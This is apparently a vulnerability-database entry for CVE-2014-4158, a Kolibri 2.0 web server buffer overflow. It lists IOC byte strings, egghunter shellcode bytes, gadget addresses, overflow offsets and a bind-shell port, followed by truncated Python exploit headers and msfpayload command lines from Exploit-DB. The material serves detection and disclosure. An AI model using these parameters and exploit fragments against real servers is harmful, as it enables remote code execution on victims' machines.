CVE-2014-4158
Published 2014-06-13
Stack-based buffer overflow in Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a GET request.
Priority P258 · high · CVSS 2.0 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: EPSS 14.30% (96.2th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| senkas | kolibri | — | — |
Detection & IOCs (extracted from sources)
- bytes: \xEB\xBA\x90\x90
- bytes: \xC2\x15\x40
- bytes: dogedoge
- bytes: \x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x64\x6f\x67\x65\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
- bytes: \x63\x46\x92\x7c
- bytes: \x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4
- Exploit sends a GET request with an oversized URI (buffer of 792–794+ bytes of NOP sleds, egghunter, and shellcode) to trigger the stack-based buffer overflow in Kolibri 2.0.
- The SEH-based exploit (exploit 34059) places the egghunter tag 'doge' (\x64\x6f\x67\x65) in the Host header alongside the shellcode; detect HTTP requests where the Host header contains binary/shellcode content.
- The classic stack overflow exploit (exploit 33027) uses a call-ESP gadget at 0x7C924663 (kernel32/ntdll on XP SP3 Spanish); the EIP overwrite value \x63\x46\x92\x7c is a reliable detection artifact in the GET URI payload.
- The SEH overwrite exploit (exploit 34059) uses a pop/pop/ret gadget at 0x4015C2 inside kolibri.exe itself; presence of \xC2\x15\x40 in the GET URI is a strong indicator of exploitation.
- Monitor HTTP traffic to Kolibri 2.0 for GET requests with URI lengths exceeding 515 bytes, which is the approximate overflow threshold used in both exploits.
- The bind-shell payload in exploit 34059 opens TCP port 5698 on the victim; monitor for unexpected listening services on that port after exploitation.
- The SEH exploit (34059) targets specific offsets per OS: 792 bytes for Windows XP SP2/Server 2003, 794 bytes for Windows 7 SP1; the pop/pop/ret gadget (0x4015C2) is from kolibri.exe itself and is version-specific.
- The call-ESP EIP gadget 0x7C924663 used in exploit 33027 is specific to Windows XP SP3 Spanish; the gadget address will differ on other OS versions/languages.
- The alpha-mixed encoded shellcode in exploit 34059 is designed to avoid bad characters; the egghunter tag 'doge' (\x64\x6f\x67\x65) must appear twice consecutively in memory for the hunter to locate the shellcode.
No detection rules found.
Exploit-DB: Kolibri Web Server 2.0 - GET (SEH) (exploitdb, 2014-07-14)
---
```python
#!/usr/bin/python
# Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit
# Exploit Author : Revin Hadi S
# Date : 14/07/2014
# Vendor : http://www.senkas.com
# Version : 2.0
# Tested on : Windows XP SP2 Eng, Windows Server 2003 Eng, Win 7 SP1 Eng
import socket, sys

help = """Kolibri WebServer 2.0 Get Request SEH Exploit
Target
[1]Windows XP SP2 Eng & Windows 2003 SP2 Eng
[2]Windows 7 SP1 Eng
Usage : %s [rhost] [port] [target]""" % sys.argv[0]

# expects exactly three arguments: host, port and target index
try:
    script, rhost, port, target = sys.argv
except ValueError:
    print help
    exit()

try:
    port = int(port)
    target = int(target)
except ValueError:
    print "Port & Target should number !"
    exit()

#msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_mixed -t c
shellcode = ("\x89\
```
Exploit-DB: Kolibri Web Server 2.0 - GET Stack Buffer Overflow (exploitdb, 2014-04-25)
---
```python
#!/usr/bin/python
# Exploit Title: Kolibri GET request Stack buffer Overflow
# Date: 25 April 2014
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Vendor Homepage: http://www.senkas.com/kolibri/download.php
# Version: Kolibri 2.0
# Tested on: Windows XP SP3, Spanish
# Thanks: To my wife for putting up with my possessions
# Description:
# A buffer overflow is triggered when a long GET command is sent to the server.
import socket, sys, os, time

# expects a host and a port on the command line
if len(sys.argv) != 3:
    print "[*] Uso: %s \n" % sys.argv[0]
    print "[*] Exploit created by Polunchis"
    print "[*] https://www.intrusionlabs.com.mx"
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])

#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -
```
No writeups or analysis indexed.
References
- http://osvdb.org/show/osvdb/108090
- http://osvdb.org/show/osvdb/70808
- http://packetstormsecurity.com/files/126332/Kolibri-2.0-Stack-Buffer-Overflow.html
- http://www.exploit-db.com/exploits/33027
- http://www.exploit-db.com/exploits/34059
- http://www.securityfocus.com/bid/68195